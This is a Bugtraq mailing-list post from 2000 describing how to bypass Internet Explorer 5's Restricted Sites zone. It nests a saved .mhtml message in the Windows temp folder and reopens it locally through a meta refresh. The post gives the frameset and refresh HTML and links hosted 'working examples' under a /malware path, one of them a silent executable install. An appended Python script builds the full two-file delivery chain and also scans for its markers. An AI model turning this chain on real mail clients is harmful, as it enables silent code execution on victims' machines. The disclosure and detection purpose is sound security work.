Bugtraq mailing list archives

Re: MICROSOFT SECURITY FLAW?


From: http-equiv () excite com (http-equiv () excite com)
Date: Sun, 4 Jun 2000 20:20:26 -0700


On Thu, 18 May 2000 16:45:20 -0400, Russ wrote:

|  Simply modifying your Outlook (98/2000/OE 5.0) Security setting to
|  "Restricted Sites" shuts this down clean. The ActiveX control cannot be
|  invoked and the user does not have an option to by-pass the security (and
|  no files, .chm or .exe, are copied down).
|
|  Microsoft's "Outlook Email Security Update" will do this automatically
|  when it's released and applied. Meanwhile, anyone who hasn't already realized
|  their Outlook Security should be set to "Restricted Sites" deserves more
|  than an oolala and a joke...;-]
|
|  Cheers,
|  Russ - NTBugtraq Editor
|  "dot-age" (as in "we're in the dot-age") = senility (source Webster's)

Sunday, June 4, 2000

Thanks for your message:

It would appear that setting the so-called Security Zone to "Restricted
Sites" does indeed shut it down quite efficiently. This is owing to the
delivery of the file via ActiveX controls which is disallowed. However,
there is a good possibility that the "Restricted Sites" Zone can be
defeated.

Consider the following:

1. It is understood that the so-called Security Zone settings are only
applied to files that are in the Temporary Internet Files folder. It assumes
that all other files on the computer are safe.

2. If that is the case, in order to defeat the so-called Security Zone
settings, we would need to place our files on the target computer anywhere
except the Temporary Internet Files folder.

Can we do that?

(a) IE5 and accompanying mail and news client can do this for us. Through
them we can inject our files into the temp folder for later retrieval.

How so?

(b) manufacture the file that you wish to place in the target computer's
temp folder. This can be a simple combination ActiveX and ActiveScripting
file which we would like to trigger later, or an elaborate "Silent delivery
and installation of an executable on a target computer" file as detailed in
this thread.

(c) run the file through the mail or news client effectively embedding it in
base64. Thereafter save the file as either *.nws, *.eml or *.mhtml.

(d) we then create a second new html email or html news post and embed the
file that we want to deliver, in it. We do this by creating a simple html
frameset and embed the file to be delivered in that:

<frameset rows="10%,*">
<frame src="FILE_TO_BE_DELIVERED.MHTML" >
</frameset>

(e) we then run this combination of files through the mail or news client
and effectively embed both in base64.

What will happen?

When the combination file is opened, it will read the embedded file
contained within it, through the frames and deposit the file, with full name
intact, into the c:/windows/temp folder, where we can call it later. From
this location we are out of the so-called Security Zone and can do as we
please.

But ActiveScripting is Disabled?

In the second file, along with the html frameset we include the very simple
HTTP-EQUIV meta tag known as refresh.

<meta http-equiv="refresh" content="30;
url=mhtml:file://C:\WINDOWS\TEMP\k00l.mhtml">

What happens is because the file we are calling is located in the
c:/windows/temp folder, we are inside (or outside) any setting of the
so-called  Security Zones. The browser will bounce to our file in the temp
folder and open it locally. Our file in the temp folder can contain all
sorts of goodies including "Silent delivery and installation of an
executable on a target computer". As we are now local, anything and
everything will work, including all ActiveScripting and all ActiveX
controls. The following set of working examples include just that. The first
incorporating an executable (*.exe), the second containing nothing more than
ActiveScripting and an ActiveX control.

These have been tested on IE5.0 and IE5.1 (both updated with all security
patches as of time of writing) with everything disabled in the so-called
Security Zone including ActiveScripting, running of ActiveX controls etc.
Every possible selection under Custom Level set to: DISABLE

[IE5.5 being beta fails. However it raises other curious possibilities when
it is released]

Important Notes:

1. The working examples below represent a generic and diluted approach in
order to keep things simple.
2. The meta refresh tag doesn't work from inside the html email or html news
post. There is a workaround for that. It does of course work in the browser.
3. There is the limitation of having a setTimeout independent of the
ActiveScripting in the files via the meta refresh tag as it could fire
before the files have been delivered.
4. The file name references appear to be extremely sensitive, the examples
should work 99.99% of the time.
5. Again it requires a default installation of Windows 95 and 98 where the
temp folder is c:/windows/temp.

Working Examples:

1.The first example incorporates a different harmless joke program. It is
quite popular and has not too long ago been added to several Anti-Virus
databases (or signature files).  There is a good possibility that your
Anti-Virus software will disallow the "Silent delivery and installation of
an executable on a target computer" for that reason. There is an even better
chance it will not even know what is happening. This working example is set
to an unnecessary lengthy delay to allow for download on feeble
i-connections. The delay is 30 seconds:

http://members.xoom.com/malware/0uch.mhtml

2. The second is a whimsical example of pure text containing ActiveScripting
and a pre-registered ActiveX control, you'll find the operation of the
ActiveX control in the main browser window and you won't miss the operation
of the ActiveScripting.

note: it is suggested not to test this one if you do not know how to reset
your browser:

http://members.xoom.com/malware/k00l.mhtml

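The two-file chain from steps (b) through (e), together with the markers a mail gateway could check a saved message for, as an added worked example. This is not part of the original post and does not reproduce the 0uch/k00l files it links: the inner "payload" is a harmless placeholder page, and the file names, the MIME boundary and the content type used to label the nested part are assumptions chosen to match the post's own examples.

```python
"""Added example (not from the post): builds the two-file .mhtml chain
described in steps (b) to (e) and scans a saved .mhtml/.eml/.nws for
its tell-tale markers. The inner "payload" is a harmless placeholder;
the 0uch/k00l files the post links are not reproduced. File names,
the MIME boundary and the nested part's content type are assumptions."""
import base64
import re
from email import policy
from email.parser import BytesParser

BOUNDARY = "----=_NextPart_000_0000_01BFCE8A.00000000"  # made-up boundary
INNER_NAME = "k00l.mhtml"          # name used in the post's refresh URL
OUTER_NAME = "0uch.mhtml"          # name of the post's first example
TEMP_DIR = r"C:\WINDOWS\TEMP"      # default Win95/98 temp folder (post, note 5)


def build_mhtml(parts):
    """Serialize (content_type, content_location, body_bytes) tuples as one
    multipart/related file with every part base64 encoded, the shape
    Outlook Express writes when a message is saved as .mhtml/.eml."""
    out = ["MIME-Version: 1.0",
           "Content-Type: multipart/related;",
           f'\tboundary="{BOUNDARY}";',
           '\ttype="text/html"',
           ""]
    for ctype, location, body in parts:
        out += [f"--{BOUNDARY}",
                f"Content-Type: {ctype}",
                "Content-Transfer-Encoding: base64",
                f"Content-Location: {location}",
                "",
                base64.encodebytes(body).decode("ascii").rstrip("\n")]
    out.append(f"--{BOUNDARY}--")
    return ("\n".join(out) + "\n").encode("ascii")


def build_inner(payload_html: str) -> bytes:
    """Steps (b)/(c): the file we want to end up in the temp folder."""
    return build_mhtml([("text/html", INNER_NAME, payload_html.encode("ascii"))])


def build_outer(inner: bytes, delay: int = 30) -> bytes:
    """Steps (d)/(e): a frameset that pulls the inner file in by name (so the
    client writes it to the temp folder under that name) plus the meta refresh
    that reopens it from there, as a local file, after `delay` seconds."""
    frameset = (
        "<html><head>\n"
        f'<meta http-equiv="refresh" content="{delay}; '
        f'url=mhtml:file://{TEMP_DIR}\\{INNER_NAME}">\n'
        "</head>\n"
        '<frameset rows="10%,*">\n'
        f'<frame src="{INNER_NAME}">\n'
        "</frameset></html>\n"
    )
    return build_mhtml([
        ("text/html", OUTER_NAME, frameset.encode("ascii")),
        # how OE labels a nested .mhtml part is not stated in the post
        ("application/octet-stream", INNER_NAME, inner),
    ])


LOCAL_REFRESH = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*"?refresh"?[^>]*url\s*=\s*(mhtml:file://[^"\s>]+)',
    re.I)
FRAME_TO_SAVED = re.compile(
    r'<i?frame[^>]*src\s*=\s*"?([^"\s>]+\.(?:mhtml|eml|nws))', re.I)


def scan_mhtml(data: bytes, depth: int = 0) -> dict:
    """Markers a mail gateway could key on: meta refreshes whose target is an
    mhtml:file:// URL, frames that pull in another saved message, and saved
    messages nested inside this one (which are scanned recursively)."""
    found = {"local_refresh": [], "frame_to_saved": [], "nested": []}
    msg = BytesParser(policy=policy.default).parsebytes(data)
    for part in msg.walk():
        if part.is_multipart():
            continue
        body = part.get_payload(decode=True) or b""
        loc = str(part.get("Content-Location", ""))
        if part.get_content_type() == "text/html":
            text = body.decode("latin-1", "replace")
            found["local_refresh"] += [(loc, m.group(1)) for m in LOCAL_REFRESH.finditer(text)]
            found["frame_to_saved"] += [(loc, m.group(1)) for m in FRAME_TO_SAVED.finditer(text)]
        elif b"MIME-Version:" in body[:512] and depth < 4:
            found["nested"].append(loc)
            for key, hits in scan_mhtml(body, depth + 1).items():
                found[key] += hits
    return found


if __name__ == "__main__":
    outer = build_outer(build_inner("<html><body>placeholder</body></html>"))
    for key, hits in scan_mhtml(outer).items():
        print(key, hits)
```

The scanner decodes every base64 part before looking at it, which matters here because the post's whole point is that the interesting content sits one or two base64 layers down, where a filter that only looks at the outer HTML never sees it.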